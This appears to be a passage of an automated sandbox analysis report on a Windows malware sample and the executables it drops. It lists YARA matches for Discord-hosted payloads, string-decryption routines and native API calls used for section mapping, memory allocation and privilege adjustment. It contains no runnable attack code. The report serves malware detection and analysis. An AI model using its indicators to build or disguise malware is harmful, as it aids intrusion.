Source: ssbavbe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ssbavbe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ssbavbe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll Jump to behavior
Uses 32bit PE files
Source: F7E3DjYJpC.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 23.0.3C84.exe.b10000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 17.0.69B.exe.500000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 23.0.3C84.exe.b10000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 23.2.3C84.exe.b10000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 23.0.3C84.exe.b10000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 17.0.69B.exe.500000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 17.0.69B.exe.500000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.0.1254.exe.550000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.0.1254.exe.550000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.0.1254.exe.550000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 23.0.3C84.exe.b10000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 17.0.69B.exe.500000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.0.1254.exe.550000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\3C84.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\69B.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\1254.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Code function: String function: 0040B550 appears 50 times
Source: C:\Users\user\AppData\Roaming\iwbavbe Code function: String function: 00420290 appears 40 times
Source: C:\Users\user\AppData\Roaming\iwbavbe Code function: String function: 0041D120 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: String function: 6ABBD08C appears 34 times
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: String function: 6AB6B150 appears 122 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 4_2_0040185B Sleep,NtTerminateProcess, 4_2_0040185B
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 4_2_00401866 Sleep,NtTerminateProcess, 4_2_00401866
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 4_2_0040187A Sleep,NtTerminateProcess, 4_2_0040187A
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 4_2_0040163B NtMapViewOfSection, 4_2_0040163B
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 4_2_004018D3 NtTerminateProcess, 4_2_004018D3
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 4_2_00401884 Sleep,NtTerminateProcess, 4_2_00401884
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 4_2_00401888 NtTerminateProcess, 4_2_00401888
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 4_2_0040156A NtMapViewOfSection, 4_2_0040156A
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 4_2_004015DB NtMapViewOfSection,NtMapViewOfSection, 4_2_004015DB
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 4_2_004017EA Sleep,NtTerminateProcess, 4_2_004017EA
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 4_1_0040156A NtMapViewOfSection, 4_1_0040156A
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 4_1_004015DB NtMapViewOfSection,NtMapViewOfSection, 4_1_004015DB
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 4_1_0040163B NtMapViewOfSection, 4_1_0040163B
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Code function: 12_2_0040185B Sleep,NtTerminateProcess, 12_2_0040185B
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Code function: 12_2_00401866 Sleep,NtTerminateProcess, 12_2_00401866
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Code function: 12_2_0040187A Sleep,NtTerminateProcess, 12_2_0040187A
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Code function: 12_2_0040163B NtMapViewOfSection, 12_2_0040163B
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Code function: 12_2_004018D3 NtTerminateProcess, 12_2_004018D3
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Code function: 12_2_00401884 Sleep,NtTerminateProcess, 12_2_00401884
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Code function: 12_2_00401888 NtTerminateProcess, 12_2_00401888
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Code function: 12_2_0040156A NtMapViewOfSection, 12_2_0040156A
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Code function: 12_2_004015DB NtMapViewOfSection,NtMapViewOfSection, 12_2_004015DB
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Code function: 12_2_004017EA Sleep,NtTerminateProcess, 12_2_004017EA
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_0040181C Sleep,NtTerminateProcess, 20_2_0040181C
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00402406 NtEnumerateKey, 20_2_00402406
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00401F25 NtQuerySystemInformation, 20_2_00401F25
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00401828 Sleep,NtTerminateProcess, 20_2_00401828
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00402431 NtEnumerateKey, 20_2_00402431
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_004017DA Sleep,NtTerminateProcess, 20_2_004017DA
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_004017F8 NtTerminateProcess, 20_2_004017F8
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_0040209A NtQuerySystemInformation, 20_2_0040209A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_004017A3 Sleep,NtTerminateProcess, 20_2_004017A3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA98C0 ZwDuplicateObject,LdrInitializeThunk, 20_2_6ABA98C0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9820 ZwEnumerateKey,LdrInitializeThunk, 20_2_6ABA9820
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9860 ZwQuerySystemInformation,LdrInitializeThunk, 20_2_6ABA9860
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA99A0 ZwCreateSection,LdrInitializeThunk, 20_2_6ABA99A0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9600 ZwOpenKey,LdrInitializeThunk, 20_2_6ABA9600
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA967A NtQueryInformationProcess,LdrInitializeThunk, 20_2_6ABA967A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9660 ZwAllocateVirtualMemory,LdrInitializeThunk, 20_2_6ABA9660
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9780 ZwMapViewOfSection,LdrInitializeThunk, 20_2_6ABA9780
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9E2BB ZwWaitForAlertByThreadId, 20_2_6AB9E2BB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9AB0 ZwWaitForMultipleObjects, 20_2_6ABA9AB0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB652A5 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwFsControlFile,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection, 20_2_6AB652A5
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB61AA0 RtlAllocateHandle,RtlReAllocateHeap,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,RtlAllocateHeap, 20_2_6AB61AA0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB95AA0 TpSetPoolMaxThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMaxThreads, 20_2_6AB95AA0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38ADD RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC38ADD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6429E RtlInitUnicodeString,ZwClose,LdrQueryImageFileKeyOption, 20_2_6AB6429E
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAAA90 ZwQuerySystemInformationEx, 20_2_6ABAAA90
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9D294 ZwQueryAttributesFile,RtlFreeHeap,ZwClose,RtlFreeHeap, 20_2_6AB9D294
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB82280 RtlAcquireSRWLockExclusive,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive,ZwTerminateProcess, 20_2_6AB82280
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAB280 ZwWow64DebuggerCall, 20_2_6ABAB280
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAAAF0 ZwRaiseHardError, 20_2_6ABAAAF0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAAAE0 ZwRaiseException, 20_2_6ABAAAE0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9AE0 ZwTraceEvent, 20_2_6ABA9AE0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8FAD0 RtlAcquireSRWLockShared,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockShared,ZwTerminateProcess, 20_2_6AB8FAD0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF1AD6 ZwFreeVirtualMemory, 20_2_6ABF1AD6
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAAAC0 ZwQueryWnfStateNameInformation, 20_2_6ABAAAC0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9B230 EtwEventWrite,ZwTraceEvent,RtlNtStatusToDosError,EtwEventWrite, 20_2_6AB9B230
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB68239 RtlInitUnicodeStringEx,ZwQueryValueKey,RtlInitUnicodeStringEx,RtlPrefixUnicodeString,ZwEnumerateKey,ZwOpenKey,RtlInitUnicodeStringEx,ZwQueryValueKey,RtlFreeHeap,ZwClose,RtlAllocateHeap,RtlCompareUnicodeString,ZwClose,RtlFreeHeap,ZwClose, 20_2_6AB68239
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A229 ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwQueryVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlFillMemoryUlong,DbgPrint,DbgPrint,DbgPrint, 20_2_6AB8A229
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB64A20 RtlGetCurrentServiceSessionId,RtlFreeHeap,ZwClose,RtlReleaseActivationContext,LdrUnloadDll, 20_2_6AB64A20
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAAA20 ZwQuerySecurityAttributesToken, 20_2_6ABAAA20
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38A62 RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC38A62
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB65210 RtlGetCurrentDirectory_U,memcpy,RtlGetCurrentDirectory_U,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 20_2_6AB65210
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9A00 ZwProtectVirtualMemory, 20_2_6ABA9A00
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38214 RtlAcquireSRWLockExclusive,ZwSetInformationWorkerFactory,RtlReleaseSRWLockExclusive, 20_2_6AC38214
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB69240 ZwClose,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlAcquireSRWLockExclusive,RtlFreeHeap, 20_2_6AB69240
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF1242 ZwUnmapViewOfSection,ZwClose,ZwClose,ZwClose,ZwClose,ZwClose, 20_2_6ABF1242
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB94BAD RtlAcquireSRWLockExclusive,memset,ZwTraceControl,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap, 20_2_6AB94BAD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAA3A0 ZwGetCompleteWnfStateSubscription, 20_2_6ABAA3A0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB62B93 TpSetDefaultPoolMaxThreads,ZwDuplicateToken, 20_2_6AB62B93
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9939F RtlInitializeCriticalSectionEx,ZwDelayExecution, 20_2_6AB9939F
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAA390 ZwGetCachedSigningLevel, 20_2_6ABAA390
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB623F6 ZwClose,RtlFreeHeap, 20_2_6AB623F6
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC2138A memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC2138A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9BF0 ZwAlertThreadByThreadId, 20_2_6ABA9BF0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC21BA8 RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC21BA8
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB62BC2 ZwOpenThreadToken,ZwSetInformationThread,ZwClose, 20_2_6AB62BC2
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38BB6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC38BB6
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC39BBE RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC39BBE
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB69335 ZwClose,ZwClose, 20_2_6AB69335
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38B58 RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC38B58
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC16369 RtlInitUnicodeString,ZwOpenFile,ZwCreateSection,ZwMapViewOfSection,ZwClose,ZwClose, 20_2_6AC16369
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB64B00 TpCallbackMayRunLong,TpCallbackMayRunLong,ZwSetInformationWorkerFactory, 20_2_6AB64B00
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9B00 ZwSetValueKey, 20_2_6ABA9B00
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB95306 ZwReleaseKeyedEvent, 20_2_6AB95306
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB93B7A RtlAllocateHeap,ZwQuerySystemInformationEx,memset,RtlFreeHeap, 20_2_6AB93B7A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB62B7E ZwSetInformationThread,ZwClose, 20_2_6AB62B7E
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAAB70 ZwReleaseWorkerFactoryWorker, 20_2_6ABAAB70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF8372 ZwClose,RtlStringFromGUIDEx,ZwCreateKey,RtlFreeUnicodeString, 20_2_6ABF8372
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC2131B RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC2131B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAAB60 ZwReleaseKeyedEvent, 20_2_6ABAAB60
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABE7365 RtlRunOnceExecuteOnce,ZwQuerySystemInformation,RtlCaptureContext,memset,RtlReportException, 20_2_6ABE7365
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB76B6B ZwQueryAttributesFile,RtlDeleteBoundaryDescriptor, 20_2_6AB76B6B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB93B48 ZwClose,ZwClose, 20_2_6AB93B48
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB918B9 ZwCreateTimer2,ZwCreateWaitCompletionPacket,ZwAssociateWaitCompletionPacket,ZwClose, 20_2_6AB918B9
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9F0BF ZwOpenFile,RtlFreeHeap,ZwQueryVolumeInformationFile,RtlAllocateHeap,memcpy,ZwClose,ZwClose,RtlFreeHeap, 20_2_6AB9F0BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAB0B0 ZwTraceControl, 20_2_6ABAB0B0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8F0AE ZwSetInformationWorkerFactory, 20_2_6AB8F0AE
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8E090 RtlWow64EnableFsRedirectionEx,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent, 20_2_6AB8E090
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAA890 ZwQueryDebugFilterState, 20_2_6ABAA890
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9890 ZwFsControlFile, 20_2_6ABA9890
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA108B ZwClose, 20_2_6ABA108B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB63880 TpSetWaitEx,RtlAllocateHeap,ZwGetCompleteWnfStateSubscription,RtlFreeHeap,TpSetWaitEx, 20_2_6AB63880
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABE3884 ZwQueryValueKey,RtlAllocateHeap,ZwQueryValueKey,RtlFreeHeap, 20_2_6ABE3884
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6B8F0 TpSetPoolStackInformation,ZwSetInformationWorkerFactory, 20_2_6AB6B8F0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB780FC RtlEqualUnicodeString,ZwMapViewOfSection,ZwUnmapViewOfSection,LdrQueryImageFileKeyOption,RtlAcquirePrivilege,RtlReleasePrivilege, 20_2_6AB780FC
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB640FD RtlImageNtHeaderEx,DbgPrintEx,memset,RtlDebugPrintTimes,DbgPrintEx,wcsstr,DbgPrintEx,DbgPrintEx,wcschr,DbgPrintEx,ZwSetInformationProcess, 20_2_6AB640FD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC160A2 ZwQueryInformationFile, 20_2_6AC160A2
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAA0D0 ZwCreateTimer2, 20_2_6ABAA0D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA98D0 ZwQueryAttributesFile, 20_2_6ABA98D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA10D7 ZwOpenKey,ZwCreateKey, 20_2_6ABA10D7
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABFB8D0 RtlAcquirePrivilege,RtlAllocateHeap,ZwSetInformationThread,RtlImpersonateSelfEx,ZwOpenProcessTokenEx,ZwAdjustPrivilegesToken,RtlAllocateHeap,ZwAdjustPrivilegesToken,RtlFreeHeap,RtlFreeHeap,ZwClose,ZwSetInformationThread,ZwClose,RtlFreeHeap, 20_2_6ABFB8D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB670C0 ZwClose,RtlFreeHeap,RtlFreeHeap, 20_2_6AB670C0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA00C2 ZwAlertThreadByThreadId, 20_2_6ABA00C2
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9830 ZwOpenFile, 20_2_6ABA9830
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB94020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion, 20_2_6AB94020
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38858 ZwAlertThreadByThreadId, 20_2_6AC38858
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6F018 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap, 20_2_6AB6F018
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9800 ZwOpenProcessTokenEx, 20_2_6ABA9800
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF1879 ZwAllocateVirtualMemory,memset,RtlInitializeSid, 20_2_6ABF1879
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB7106F ZwOpenKey,ZwClose, 20_2_6AB7106F
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC3F019 RtlInitUnicodeString,RtlInitUnicodeString,ZwQueryValueKey,RtlAllocateHeap,ZwQueryValueKey,RtlInitUnicodeString,ZwClose,RtlFreeHeap, 20_2_6AC3F019
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB65050 RtlSetCurrentDirectory_U,RtlAllocateHeap,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlSetCurrentDirectory_U,RtlFreeHeap,RtlFreeHeap, 20_2_6AB65050
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9840 ZwDelayExecution, 20_2_6ABA9840
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB919B8 RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwWaitForSingleObject,RtlQueryInformationActiveActivationContext,RtlQueryInformationActivationContext, 20_2_6AB919B8
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAA9B0 ZwQueryLicenseValue, 20_2_6ABAA9B0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAB1A0 ZwWaitForKeyedEvent, 20_2_6ABAB1A0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC389E7 RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC389E7
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6519E RtlEqualUnicodeString,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 20_2_6AB6519E
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9990 ZwQueryVolumeInformationFile, 20_2_6ABA9990
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9980 ZwCreateEvent, 20_2_6ABA9980
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAB180 ZwWaitForAlertByThreadId, 20_2_6ABAB180
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8C182 RtlGetCurrentServiceSessionId,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive, 20_2_6AB8C182
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC2A189 RtlAcquireSRWLockExclusive,ZwGetNlsSectionPtr,RtlAllocateHeap,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive, 20_2_6AC2A189
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC249A4 ZwAllocateVirtualMemory,RtlCompareMemory,memcpy,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint, 20_2_6AC249A4
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF19C8 ZwCreateSection,ZwMapViewOfSection,memset,ZwUnmapViewOfSection,ZwClose, 20_2_6ABF19C8
